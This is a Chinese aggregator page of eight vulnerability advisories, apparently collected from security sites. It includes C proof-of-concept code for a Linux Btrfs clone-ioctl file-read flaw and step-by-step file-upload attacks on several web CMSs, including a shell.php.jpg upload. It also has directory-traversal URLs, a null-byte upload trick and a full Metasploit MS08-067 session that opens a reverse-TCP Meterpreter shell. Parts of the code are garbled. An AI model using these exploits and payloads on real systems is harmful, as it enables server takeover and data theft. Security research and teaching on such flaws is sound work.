“stilllife”通过精心收集,向本站投稿了8篇linux kernel 2.6.x Btrfs实现创建不安全克隆文件漏洞漏洞预警,下面是小编整理后的linux kernel 2.6.x Btrfs实现创建不安全克隆文件漏洞漏洞预警,欢迎大家阅读借鉴,并有积极分享。
篇1:linux kernel 2.6.x Btrfs实现创建不安全克隆文件漏洞漏洞预警
影响版本:
Linux kernel 2.6.x
漏洞描述:
Linux Kernel是开放源码操作系统Linux所使用的内核,
Linux Kernel的Btrfs实现中btrfs_ioctl_clone ioctl将用户所提供的源文件描述符拷贝到了目标文件描述符,但在执行拷贝操作之前没有检查源文件描述符是否已被打开读取,这允许攻击者无需拥有读权限便可读取克隆的文件。<*参考
bugzilla.redhat.com/show_bug.cgi?format=multiple&id=593226
bugs.launchpad.net/ubuntu/+source/linux/+bug/579585
*>
测试方法:
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!#include
#include
#include
#include
#define BTRFS_IOC_CLONE _IOW(0x94, 9, int)
int main(int argc, char * argv[])
{
if(argc < 3) {
printf(“Usage: %s [target] [output]n”, argv[0]);
exit(-1);
}
int output = open(argv[2], O_WRONLY | O_CREAT, 0644);
/* Note - opened for writing, not reading */
int target = open(argv[1], O_WRONLY);
ioctl(output, BTRFS_IOC_CLONE, target);
}
安全建议:
厂商补丁:
Linux
-----
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commitdiff;h=5dc6416414fb3ec6e2825fd4d20c8bf1d7fe0395
篇2:JEECMS漏洞(文件上传)漏洞预警
漏洞描述:这个漏洞很简单,上传没有过滤,注册账号之后去上传头像,jsp 都可以,会提示上传类型错误,弹出对话框,不用管它,关闭弹窗,点击右键查看源代码,你的代码已经上传上了,
JEECMS最新漏洞(文件上传)漏洞预警
,
上传后的格式为:
www.xxx.com/online/upload/M000000070500007/1349769169860.jsp?o=vLogin
篇3:MetInfov5.1.3 任意文件上传漏洞漏洞预警
MetInfo 23号发布了新版本5.1.5,修补了本文提到的漏洞,当然严格来说应该是任意变量覆盖漏洞....
ps:欢迎各种形式,首发t00ls.net
注:请勿利用本文内容从事一切非法活动,否则后果自负
author:my5t3ry
废话不多说,看代码:
includecommon.inc.php20-39$db_settings=parse_ini_file(ROOTPATH.'config/config_db.php');@extract($db_settings);require_once ROOTPATH.'include/mysql_class.php';$db=newdbmysql;$db->dbconn($con_db_host,$con_db_id,$con_db_pass,$con_db_name);define('MAGIC_QUOTES_GPC',get_magic_quotes_gpc());isset($_REQUEST['GLOBALS'])&&exit('Access Error');require_once ROOTPATH.'include/global.func.php';foreach(array('_COOKIE','_POST','_GET')as$_request){foreach($$_requestas$_key=>$_value){$_key{0}!='_'&&$$_key=daddslashes($_value);}}$query=“select * from {$tablepre}config where name='met_tablename' and lang='metinfo'”;$mettable=$db->get_one($query);$mettables=explode('|',$mettable[value]);foreach($mettablesas$key=>$val){$tablename='met_'.$val;$$tablename=$tablepre.$val;}
metinfo系统通过查询数据库的{$tablepre}config表,并将获取的结果通过foreach循环初始化表名变量,其中的
是通过代码
$db_settings = parse_ini_file(ROOTPATH.'config/config_db.php'); @extract($db_settings);
来初始化的,然后在系统中使用这样“SELECT * FROM $met_message where id=$id and lang='$lang'”的SQL查询数据库,
其中的$met_message变量就是前面foreach循环初始化的变量……
我们可以覆盖$tablepre变量使表名初始化失败,进而提交表名变量.....
我找了个后台的上传页面,通过覆盖变量绕过后台验证并且覆盖允许上传后缀列表,构造上传漏洞,
MetInfov5.1.3 任意文件上传漏洞漏洞预警
,
exp:任意文件上传
任意文件上传
篇4:天空课堂文件上传漏洞漏洞预警
简要描述:
允许上传危险文件类型,这个系统用的还是不少的
打开网络课网站,如图,登陆进去,现在网盘里传一个PHP文件,网盘竟然没过滤PHP文件,
进入后选择使用网盘文件,然后选择php文件,在切换到HTML下,就可以看到这个PHP文件在服务器上路径了,xxx.xxx.cn/SCR/Course … 31/111026085064.php,执行的时候好像不能写php大马,写个asp上去就可以了,
这个系统数据库用户用的是sa,有点。。
篇5:KCFinder 2.2 文件上传漏洞漏洞预警
KCFinder 2.X上传页未进行严格过滤,导致文件上传漏洞,
1.Go to target link
localhost/KCFinder/browse.php
2.upload your shell as [shell.php.jpg]
注:只适用于linux系统的解析漏洞,
篇6:网站常见漏洞 文件上传漏洞漏洞预警
任意文件上传漏洞
文件上传漏洞(File Upload Attack)是由于文件上传功能实现代码没有严格限制用户上传的文件后缀以及文件类型,导致允许攻击者向某个可通过 Web 访问的目录上传任意PHP文件,并能够将这些文件传递给 PHP 解释器,就可以在远程服务器上执行任意PHP脚本,
一套web应用程序,一般都会提供文件上传的功能,方便来访者上传一些文件。
下面是一个简单的文件上传表单
php的配置文件php.ini,其中选项upload_max_filesize指定允许上传的文件大小,默认是2M
$_FILES数组变量
PHP使用变量$_FILES来上传文件,$_FILES是一个数组。
如果上传test.txt,那么$_FILES数组的内容为:
$FILES
Array
{
[file] => Array
{
[name] => test.txt //文件名称
[type] => text/plain //MIME类型
[tmp_name] => /tmp/php5D.tmp //临时文件
[error] => 0 //错误信息
[size] => 536 //文件大小,单位字节
}
}
如果上传文件按钮的name属性值为file
那么使用$_FILES['file']['name']来获得客户端上传文件名称,不包含路径。使用$_FILES['file']['tmp_name']来获得服务端保存上传文件的临时文件路径
存放上传文件的文件夹
PHP不会直接将上传文件放到网站根目录中,而是保存为一个临时文件,名称就是$_FILES['file']['tmp_name']的值,开发者必须把这个临时文件复制到存放的网站文件夹中。
$_FILES['file']['tmp_name']的值是由PHP设置的,与文件原始名称不一样,开发者必须使用$_FILES['file']['name']来取得上传文件的原始名称。
上传文件时的错误信息 $_FILES['file']['error']变量用来保存上传文件时的错误信息,它的值如下:
文件上传漏洞
如果提供给网站访问者上传图片的功能,那必须小心访问者上传的实际可能不是图片,而是可以指定的PHP程序。如果存放图片的目录是一个开放的文件夹,则入侵者就可以远程执行上传的PHP文件来进行攻击。
下面是一个简单的文件上传例子:
// 设置上传文件的目录
$uploaddir = “D:/www/images/”;
// 检查file是否存在
if (isset($_FILES['file1']))
{
// 要放在网站目录中的完整路径,包含文件名
$uploadfile = $uploaddir . $_FILES['file1']['name'];
// 将服务器存放的路径,移动到真实文件名 move_uploaded_file($_FILES['file1']['tmp_name'], $uploadfile);
}
?>
……
这个例子没有检验文件后缀,可以上传任意文件,很明显的上传漏洞,
利用此漏洞 克制自由上床任意的木马文件而导致网站失陷。
漏洞防护措施
解决上面所述问题的一种方法是通过检查上传文件的类型来限制用户的文件上传,如以下代码所示。
if(isset($_POST[“form”]))
{
if($_FILES['upfile']['type'] == 'image/pjpeg') //检查文件类型是否为JPEG
{
$uploadfile = “upfiles/”.$_FILES['upfile']['name'];
//上传后文件所在的文件名和路径
move_uploaded_file($_FILES['upfile']['tmp_name'], $uploadfile);
//上传文件
print_r($_FILES);
die;
}
else
{
die(“上传文件的格式不正确!”);
}
}
?>
上面的代码要求用户上传的文件必须是JPEG类型的图片文件,彻底地避免了终端用户通过上传PHP脚本危害服务器的行为。
文件上传路径变量过滤不严
在许多论坛的用户发帖页面中存在这样的上传Form,如图7-27所示,其网页编程代码为:
“
”
在其中“filepath”是文件上传路径,由于网页编写者未对该变量进行任何过滤,因此用户可以任意修改该变量值。在网页编程语言中有一个特殊的截止符“”,该符号的作用是通知网页服务器中止后面的数据接收。利用该截止符可们可以重新构造filepath,例如正常的上传路径是:
“www.***.com/bbs/uploadface/09240824.jpg”,
但是当我们使用“”构造filepath为
“www.***.com/newmm.asp/200409240824.jpg ”
这样当服务器接收filepath数据时,检测到newmm.asp后面的后理解为filepath的数据就止结束了,这样我们上传的文件就被保存成了:“www.***.com/newmm.asp”。
利用这个上传漏洞就可以任意上传如.ASP的网页木马,然后连接上传的网页即可控制该网站系统。
提示:可能有读者会想,如果网页服务器在检测验证上传文件的格式时,碰到“/0”就截止,那么不就出现文件上传类型不符的错误了吗?其实在检测验证上传文件的格式时,系统是从filepath的右边向左边读取数据的,因此它首先检测到的是“.jpg”,当然就不会报错了。
最安全的防范办法就是删除上传页面
篇7:风讯浏览目录创建文件漏洞漏洞预警
简要描述:
通过测试发现该程序FolderImageList.asp FolderImageList.asp FileManage.asp 几个脚本程序在处理用户提交的恶意路径参数时没有进行控制过滤,导致攻击者可以进行服务器目前查看,创建等操作,恶意攻击者可以利用该缺陷进行脚本木马的创建利用,导致服务器被控制,
详细说明:
先注册用户名登录我后执行下边的命令就可以了
1 游览目录文件
192.168.1.62/User/CommPages/FolderImageList.asp?CurrPath=/admin/
2 创建一个目录
192.168.1.62/User/CommPages/FolderImageList.asp?CurrPath=/123456/
3 修改一个目录名称
192.168.1.62/User/FileManage.asp?Type=FolderReName&OldFileName=../../123456&NewFileName=654321
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝
篇8:MS08067漏洞漏洞预警
这个漏洞已经暴露了很久了,这里我就不说原理了我也不会,所以直接用metasploit操作一下,大牛请绕过
root@bt:~# genlist -s 10.10.10.*
10.10.10.1
10.10.10.2
10.10.10.128
10.10.10.130
10.10.10.254
root@bt:~# nmap -sS -Pn 10.10.10.128
Starting Nmap 6.01 ( nmap.org ) at 2014-04-23 01:49 EDT
Nmap scan report for attacker.dvssc.com (10.10.10.128)
Host is up (0.0000060s latency).
All 1000 scanned ports on attacker.dvssc.com (10.10.10.128) are closed
Nmap done: 1 IP address (1 host up) scanned in 0.08 seconds
root@bt:~# nmap -sS -Pn 10.10.10.130
Starting Nmap 6.01 ( nmap.org ) at 2014-04-23 01:50 EDT
Nmap scan report for service.dvssc.com (10.10.10.130)
Host is up (0.011s latency).
Not shown: 985 closed ports
PORT STATE SERVICE
21/tcp open ftp
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
777/tcp open multiling-http
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
1027/tcp open IIS
1030/tcp open iad1
1521/tcp open oracle
6002/tcp open X11:2
7001/tcp open afs3-callback
7002/tcp open afs3-prserver
8099/tcp open unknown
MAC Address: 00:0C:29:D3:08:A0 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 0.21 seconds
root@bt:~#
root@bt:~# nmap --script=smb-check-vulns 10.10.10.130
Starting Nmap 6.01 ( nmap.org ) at 2014-04-23 01:50 EDT
Nmap scan report for service.dvssc.com (10.10.10.130)
Host is up (0.00032s latency).
Not shown: 985 closed ports
PORT STATE SERVICE
21/tcp open ftp
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
777/tcp open multiling-http
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
1027/tcp open IIS
1030/tcp open iad1
1521/tcp open oracle
6002/tcp open X11:2
7001/tcp open afs3-callback
7002/tcp open afs3-prserver
8099/tcp open unknown
MAC Address: 00:0C:29:D3:08:A0 (VMware)
Host script. results:
| smb-check-vulns:
| MS08-067: VULNERABLE
| Conficker: Likely CLEAN
| regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run)
| SMBv2 DoS (CVE-2009-3103): CHECK DISABLED (add '--script-args=unsafe=1' to run)
| MS06-025: CHECK DISABLED (remove 'safe=1' argument to run)
|_ MS07-029: CHECK DISABLED (remove 'safe=1' argument to run)
Nmap done: 1 IP address (1 host up) scanned in 0.56 seconds
root@bt:~# msfconsole
Call trans opt: received. 2-19-98 13:24:18 REC:Loc
Trace program: running
wake up, Neo...
the matrix has you
follow the white rabbit.
knock, knock, Neo.
(`. ,-,
` `. ,;' /
`. ,'/ .'
`. X /.'
.-;--''--.._` ` (
.' / `
, ` ' Q '
, , `._
,.| ' `-.;_'
: . ` ; ` ` --,.._;
' ` , ) .'
`._ , ' /_
; ,''-,;' ``-
``-..__``--`
=[ metasploit v4.5.0-dev [core:4.5 api:1.0]
+ -- --=[ 927 exploits - 499 auxiliary - 151 post
+ -- --=[ 251 payloads - 28 encoders - 8 nopsmsf > search ms08_067
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/windows/smb/ms08_067_netapi 2008-10-28 00:00:00 UTC great Microsoft Server Service Relative Path Stack Corruption
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Exploit target:
Id Name
-- ----
0 Automatic Targeting
msf exploit(ms08_067_netapi) > set RHOST 10.10.10.130
RHOST => 10.10.10.130
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 10.10.10.130 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique: seh, thread, process, none
LHOST yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Targeting
msf exploit(ms08_067_netapi) > set LHOST 10.10.10.128
LHOST => 10.10.10.128
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 10.10.10.128:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows 2003 - No Service Pack - lang:Unknown
[*] Selected Target: Windows 2003 SP0 Universal
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to 10.10.10.130
[*] Meterpreter session 1 opened (10.10.10.128:4444 -> 10.10.10.130:3722) at 2014-04-23 01:53:59 -0400
